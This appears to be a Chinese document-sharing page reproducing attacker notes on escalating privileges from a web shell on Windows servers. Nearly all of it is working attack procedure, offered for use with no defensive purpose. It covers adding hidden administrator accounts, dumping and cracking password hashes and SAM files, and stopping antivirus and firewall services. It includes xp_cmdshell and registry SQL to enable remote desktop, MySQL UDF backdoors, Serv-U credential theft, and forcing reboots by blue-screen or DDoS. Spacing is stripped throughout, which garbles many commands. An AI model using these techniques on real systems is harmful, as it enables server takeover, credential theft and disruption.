web提权笔记.docx
- 文档编号:11585381
- 上传时间:2023-03-19
- 格式:DOCX
- 页数:11
- 大小:30.49KB
web提权笔记.docx
《web提权笔记.docx》由会员分享,可在线阅读,更多相关《web提权笔记.docx(11页珍藏版)》请在冰豆网上搜索。
web提权笔记
【web提权】
1.能不能执行cmd就看这个命令:
netuser,net不行就用net1,再不行就上传一个net到可写可读目录,执行/cc:
\windows\temp\cookies\net1.exeuser
2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp用刚提权的用户登录进去就是system权限,再试试一般就可以了。
3.cmd拒绝访问的话就自己上传一个cmd.exe自己上传的后缀是不限制后缀的,cmd.exe/都可以。
4.cmd命令:
systeminfo,看看有没有KB952004、KB956572、KB970483这三个补丁,如果没有,第一个是pr提权,第二个是巴西烤肉提权,第三个是iis6.0提权。
6.c:
\windows\temp\cookies\这个目录
7.找sa密码或是root密码,直接利用大马的文件搜索功能直接搜索,超方便!
8.cmd执行exp没回显的解决方法:
com路径那里输入exp路径C:
\RECYCLER\pr.exe,命令那里清空(包括/c)输入”netuserjianmeidaxia/add”
9.增加用户并提升为管理员权限之后,如果连接不上3389,上传rootkit.asp脚本,访问会提示登录,用提权成功的账号密码登录进去就可以拥有管理员权限了。
10.有时变态监控不让添加用户,可以尝试抓管理哈希值,上传“PwDump7破解当前管理密码(hash值)”,俩个都上传,执行PwDump7.exe就可以了,之后到网站去解密即可。
11.有时增加不上用户,有可能是密码过于简单或是过于复杂,还有就是杀软的拦截,命令tasklist查看进程
12.其实星外提权只要一个可执行的文件即可,先运行一遍cmd,之后把星外ee.exe命名为log.csv就可以执行了。
13.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输入替换的文件路径,下面清空双引号加增加用户的命令。
14.提权很无奈的时候,可以试试TV远控,通杀内外网,穿透防火墙,很强大的。
15.当可读可写目录存在空格的时候,会出现这样的情况:
’C:
\Documents’不是内部或外部命令,也不是可运行的程序或批处理文件。
解决办法是利用菜刀的交互shell切换到exp路径,如:
CdC:
\DocumentsandSettings\AllUsers\ApplicationData\Microsoft目录然后再执行exp或者cmd,就不会存在上面的情况了,aspshell一般是无法跳转目录的~
16.有时候可以添加用户,但是添加不到管理组,有可能是administrators改名了,netuseradministrator看下本地组成员,*administrators
17.进入服务器,可以继续内网渗透这个时候可以尝试打开路由器默认帐号密码adminadmin
18.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:
”"c:
\xxx\exp.exe“whoami”记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变。
19.一般增加不上用户,或是想添加增加用户的vbs,bat,远控小马到服务器的启动项里,用“直接使服务器蓝屏重启的东东”这个工具可以实现,
20.执行PwDump7.exe抓哈希值的时候,建议重定向结果到保存为1.txt/cc:
\windows\temp\cookies\PwDump7.exe>1.txt
21.菜刀执行的技巧,上传cmd到可执行目录,右击cmd虚拟终端,help然后setpc:
\windows\temp\cmd.exe设置终端路径为:
c:
\windows\temp\cmd.exe
22.当不支持aspx,或是支持但跨不了目录的时候,可以上传一个读iis的vps,执行命令列出所有网站目录,找到主站的目录就可以跨过去了。
上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令/c“c:
\windows\temp\cookies\cscript.exe”d:
\web\iispwd.vbs
23.如何辨别服务器是不是内网?
192.168.x.x172.16.x.x10.x.x.x
((dos命令大全))
查看版本:
ver
查看权限:
whoami
查看配置:
systeminfo
查看用户:
netuser
查看进程:
tasklist
查看正在运行的服务:
tasklist/svc
查看开放的所有端口:
netstat-ano
查询管理用户名:
queryuser
查看搭建环境:
ftp127.0.0.1
查看指定服务的路径:
scqcMysql
添加一个用户:
netuserjianmeidaxia.asd/add
提升到管理权限:
netlocalgroupadministratorsjianmei/add
添加用户并提升权限:
netuserjianmeidaxia.asd/add&netlocalgroupadministratorsjianmei/add
查看制定用户信息:
netuserjianmei
查看所有管理权限的用户:
netlocalgroupadministrators
加入远程桌面用户组:
netlocalgroup“RemoteDesktopUsers”jianmei/add
突破最大连接数:
mstsc/admin/v:
127.0.0.1
删除用户:
netuserjianmei/del
删除管理员账户:
netuseradministratordaxia.asd
更改系统登陆密码:
netpassworddaxia.asd
激活GUEST用户:
netuserguest/active:
yes
开启TELNET服务:
netstarttelnet
关闭麦咖啡:
netstop“McAfeeMcShield”
关闭防火墙:
netstopsharedaccess
查看当前目录的所有文件:
dirc:
\windows\
查看制定文件的内容:
typec:
\windows\1.asp
把cmd.exe复制到c:
\windows的temp目录下并命名为cmd.txt:
copyc:
\windows\temp\cookies\cmd.exec:
\windows\temp\cmd.txt
开3389端口的命令:
REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal”“Server/vfDenyTSConnections/tREG_DWORD/d0/f
查看补丁:
dirc:
\windows\>a.txt&(for%iin(KB952004.logKB956572.logKB2393802.logKB2503665.logKB2592799.logKB2621440.logKB2160329.logKB970483.logKB2124261.logKB977165.logKB958644.log)do@typea.txt|@find/i“%i”||@echo%iNotInstalled!
)&del/f/q/aa.txt
((SQL语句直接开启3389))
3389登陆关键注册表位置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。
开启3389的SQL语句:
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,0;–
关闭3389的SQL语句:
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,1;–
2003可以实现一句话开3389:
regadd“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp”/vPortNumber/tREG_DWORD/d80/f
((常见杀软))
360tray.exe360实时保护
ZhuDongFangYu.exe360主动防御
KSafeTray.exe金山卫士McAfeeMcShield.exe麦咖啡
SafeDogUpdateCenter.exe服务器安全狗
((windows提权中敏感目录和敏感注册表的利用))
敏感目录目录权限提权用途
C:
\ProgramFiles\默认用户组users对该目录拥有查看权可以查看服务器安装的应用软件C:
\DocumentsandSettings\AllUsers\「开始」菜单\程序Everyone拥有查看权限存放快捷方式,可以下载文件,属性查看安装路径C:
\DocumentsandSettings\AllUsers\DocumentsEveryone完全控制权限上传执行cmd及expC:
\windows\system32\inetsrv\Everyone完全控制权限上传执行cmd及expC:
\windows\my.iniC:
\ProgramFiles\MySQL\MySQLServer5.0\my.ini默认用户组users拥有查看权限安装mysql时会将root密码写入该文件C:
\windows\system32\默认用户组users拥有查看权限Shift后门一般是在该文件夹,可以下载后门破解密码C:
\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动Everyone拥有查看权限可以尝试向该目录写入vbs或bat,服务器重启后运行。
C:
\RECYCLER\D:
\RECYCLER\Everyone完全控制权限回收站目录。
常用于执行cmd及expC:
\ProgramFiles\MicrosoftSQLServer\默认用户组users对该目录拥有查看权限收集mssql相关信息,有时候该目录也存在可执行权限C:
\ProgramFiles\MySQL\默认用户组users对该目录拥有查看权限找到MYSQL目录中user.MYD里的root密码C:
\oraclexe\默认用户组users对该目录拥有查看权限可以尝试利用Oracle的默认账户提权C:
\WINDOWS\system32\config默认用户组users对该目录拥有查看权限尝试下载sam文件进行破解提权C:
\ProgramFiles\Geme6FTPServer\RemoteAdmin\Remote.ini默认用户组users对该目录拥有查看权限Remote.ini文件中存放着G6FTP的密码c:
\ProgramFiles\RhinoS\Serv-U\c:
\ProgramFiles\Serv-U\默认用户组users对该目录拥有查看权限ServUDaemon.ini中存储了虚拟主机网站路径和密码c:
\windows\system32\inetsrv\MetaBase.xml默认用户组users对该目录拥有查看权限IIS配置文件C:
tomcat5.0\conf\resin.conf默认用户组users对该目录拥有查看权限Tomat存放密码的位置C:
\ZKEYS\Setup.ini默认用户组users对该目录拥有查看权限ZKEYS虚拟主机存放密码的位置
((提权中的敏感注册表位置))
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\TcpMssql端口HKLM\SYSTEM\CurrentControlSet\Control\TerminalServerDenyTSConnections远程终端值为0即为开启HKEY_LOCAL_MACHINE\SOFTWARE\MySQLAB\mssql的注册表位置HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\华众主机注册表配置位置HKEY_LOCAL_MACHINE\SOFTWARE\CatSoft\Serv-U\Domains\1\UserList\serv-u的用户及密码(su加密)位置HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp在该注册表位置PortNumber的值即位3389端口值HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Serversmysql管理工具Navicat的注册表位置,提权运用请谷歌HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\ParametersRadmin的配置文件,提权中常将其导出进行进行覆盖提权HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\IIS注册表全版本泄漏用户路径和FTP用户名漏洞HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass华众主机在注册表中保存的mssql、mysql等密码HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11星外主机mssql的sa账号密码,双MD5加密HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\ControlSet002星外ftp的注册表位置,当然也包括ControlSet001、ControlSet003
((wscript.shell的删除和恢复))
载wscript.shell对象,在cmd下或直接运行:
regsvr32/u%windir%\system32\WSHom.Ocx卸载FSO对象,在cmd下或直接运行:
regsvr32.exe/u%windir%\system32\scrrun.dll卸载stream对象,在cmd下或直接运行:
regsvr32/s/u“C:
\ProgramFiles\CommonFiles\System\ado\msado15.dll”如果想恢复的话只需要去掉/U即可重新再注册以上相关ASP组件,这样子就可以用了
((如何找到准确的终端连接端口?
))
在aspx大马里,点击“系统信息”第三个就是目前的3389端口
或是执行命令查看正在运行的服务:
tasklist/svc
找到:
svchost.exe1688TermService
记住1688这个ID值,
查看开放的所有端口:
netstat-ano
找到1688这个ID值所对应的端口就是3389目前的端口
((iis6提权提示Cannotfindwmiprvse.exe的突破方法))
突破方法一:
在IIS环境下,如果权限做得不严格,我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的,进程查看里面直接K掉
在结束之后,它会再次运行,这时候的PID值的不一样的。
这时候我们回来去运行exp,直接秒杀。
突破方法二:
虚拟主机,一般权限严格限制的,是没权限结束的,这时候我们可以考虑配合其他溢出工具让服务器强制重启,比如“直接使服务器蓝屏重启的东东”
甚至可以暴力点,DDOS秒杀之,管理发现服务器不通了首先肯定是以为服务器死机,等他重启下服务器(哪怕是IIS重启下)同样秒杀之。
((本地溢出提权))
计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.
缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.
利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.
想要执行cmd命令,就要wscript.shell组建支持,或是支持aspx脚本也行,因为aspx脚本能调用.net组件来执行cmd的命令.
((sa提权))
扫描开放的端口,1433开了就可以找sa密码提权,用大马里的搜索文件功能,sa密码一般在conn.aspconfig.aspweb.config这三个文件
也可以通过注册表找配置文件,看下支持aspx不,支持的话跨目录到别的站点上找,找到之后用aspshell自带的sql提权登录再执行命令创建用户即可。
aspx马提权执行命令有点不一样,点击数据库管理–选MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–输入帐号密码连接即可
增加一个用户:
execmaster.dbo.xp_cmdshell‘netuserjianmeidaxia.asd/add’;–提升为管理员:
execmaster.dbo.xp_cmdshell‘netlocalgroupadministratorsjianmei/add’;–
PS:
如果增加不上,说明是xp_cmdshell组建没有,增加xp_cmdshell组建:
Usemasterdbccaddextendedproc(‘xp_cmdshell’,'xplog70.dll’)
【1433一句话开3389】
Execmaster.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,0;–
((root提权))
利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,是默认安装以系统权限继承的(system权限).并且获得了root的账号密码
如何判断一台windows服务器上的mysql有没有降权?
cmd命令netuser如果存在mysqlmssql这样用户或者类似的.通常就是它的mssqlmysql服务已经被降权运行了
如何判断服务器上是否开启了mysql服务?
开了3306端口,有的管理员会把默认端口改掉.另一个判断方法就是网站是否支持php,一般支持的话都是用mysql数据库的.
如何查看root密码?
在mysql的安装目录下找到user.myd这个文件,root就藏在里面,一般是40位cmd加密,一些php网站安装的时候用的是root用户,在conn.aspconfig.asp这些文件里。
有时会显得很乱,这时就需要自己去组合,前17位在第一行可以找到,还有23位在第三行或是其他行,自己继续找。
可以直接用php脚本里“mysql执行”,或是上传个UDF.php,如果网站不支持PHP,可以去旁一个php的站,也可以把UDF.php上传到别的phpshell上也可以。
填入帐号密码之后,自然就是安装DLL了,点击“自动安装MysqlBackDoor”显示导出跟创建函数成功后,紧接着执行增加用户的命令即可。
注意:
5.0版本以下(包括5.0的)默认c:
\windows\系统目录就可以了,5.1版本以上的不能导出到系统目录下创建自定义函数,只能导出在mysql安装目录下的lib/plugin目录中
例如:
D:
/ProgramFiles/MySQL/MySQLServer5.1/lib/plugin/mysql.dll
如果密码看不见,或是组合不到40位,就本地安装一个mysql吧,1、停止mysql服务2、替换下载下来的3个文件(user.MYIuser.MYDuser.frm)3、cmd切换到bin目录下,进入mysql安全模式,cmd命令:
mysqld-nt–skip-grant-tables4、重新打开一个cmd切换到bin目录下,cmd命令:
mysql-uroot版本不同有可能是:
mysql-uroot-proot5、最后查询一下就出来了selectuser,passwordfrommysql.user;
((serv-u提权))
这个文件里包含serv-u的md5密码:
C:
\ProgramFiles\RhinoS\Serv-U\\ServUDaemon.ini
找到这个文件:
ServUDaemon.ini打开找到:
LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
再拿md5密文去解密,再用现在的密码登陆提权即可。
serv-u提权的前提是43958端口开了,且知道帐号密码!
如果帐号密码默认,直接用shell里面的serv-u提权功能即可搞定,建议用aspx马、php马去提权,因为可以看回显。
530说明密碼不是默认的,回显330说明成功,900说明密码是默认的……………..
在程序里找个快捷方式,或是相关的文件进行下载到本地,再查看文件的属性,就可以找到serv-u的安装目录了。
目录有修改权限之serv-u提权:
找到serv-u的目录,再找到用户的配置文件ServUDaemon.ini,直接增加一个用户代码,保存!
接着本地cmd命令:
ftp服务器ip
回车,输入帐号密码再回车………………….
接着先试试普通的cmd命令提权,不行的话就使用ftp提权的命令:
Quotesiteexecnetuserjianmeidaxia/add增加一个用户
Quotesiteexecnetlocalgroupadministratorsjianmei/add提升到管理员权限
200EXECcomma
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- web 笔记